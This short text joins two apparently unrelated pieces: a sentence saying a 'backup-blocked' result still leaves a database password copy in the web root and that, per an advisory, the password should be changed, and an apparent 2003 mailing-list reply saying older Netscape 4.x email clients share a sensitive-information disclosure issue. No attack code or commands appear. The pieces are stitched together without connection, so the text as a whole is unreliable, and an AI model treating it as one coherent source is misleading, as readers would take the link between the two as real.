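A "backup-blocked" result still means a copy of the database password is sitting in the web root; per the advisory, the password should be changed if such a file was reachable before the upgrade.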



Re: Potential disclosure of sensitive information in Netscape 7.0 email client

2003-01-02 Thread Blud Clot
I noticed this a while ago with netscape 4.x and those versions are still vulnerable 
as well. I've never checked 6.x.

-BludClot